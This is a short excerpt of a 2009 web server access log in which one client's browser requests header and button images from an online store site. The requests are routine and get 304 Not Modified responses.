68.123.155.181 - - [13/Jul/2009:01:07:47 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:47 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:47 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
